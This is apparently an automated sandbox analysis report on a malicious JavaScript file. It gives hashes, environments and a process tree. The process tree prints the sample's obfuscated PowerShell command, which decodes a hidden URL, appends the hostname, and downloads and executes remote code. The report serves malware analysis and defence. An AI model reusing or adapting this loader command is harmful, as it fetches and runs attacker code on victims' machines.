Analysis
-
max time kernel
401s -
max time network
403s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
26/05/2023, 16:31
Static task
static1
Behavioral task
behavioral1
Sample
NUVW1369.js
Resource
win10-20230220-en
Behavioral task
behavioral2
Sample
NUVW1369.js
Resource
win7-20230220-en
Behavioral task
behavioral3
Sample
NUVW1369.js
Resource
win10v2004-20230220-en
General
-
Target
NUVW1369.js
-
Size
747KB
-
MD5
7cf38440c1bab5520f29ea4f50ec50c1
-
SHA1
93ba640988fc04fda650ed22861460bb4a8a4768
-
SHA256
b535dc0e3da92ff7112c9d6b8e49ed32f826554343bd16ea0b32599ee5b5c4ae
-
SHA512
a1493b99043bc2351b1caa470f6509b7b5a88a1d3b0456917548a36882ac6603fd2e346e4869af63766abf195221601c9f2bde92f81270170098f3f809bebd22
-
SSDEEP
3072:yTXYmBNLkwZRnXAjoxS7wCXde+pj/uzLLLNQaAapwxDY/YhNkskLJ9KR9CHccVoZ:GyWbCpN4U
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1328 2012 conhost.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\NUVW1369.js1⤵PID:2040
-
C:\Windows\system32\conhost.execonhost --headless powershell @(2554,2566,2566,2562,2508,2497,2497,2565,2550,2552,2568,2565,2496,2566,2561,2562,2497,2564,2566,2496,2562,2554,2562,2513,2555,2511)|foreach{$ofebnw=$ofebnw+[char]($_-2450)};$rplotc='l';new-alias tfyfx cur$rplotc;$sibz=$(hostname);.$([char](7892-7787)+'ex')(tfyfx -useb "$ofebnw$sibz")1⤵
- Process spawned unexpected child process
PID:1328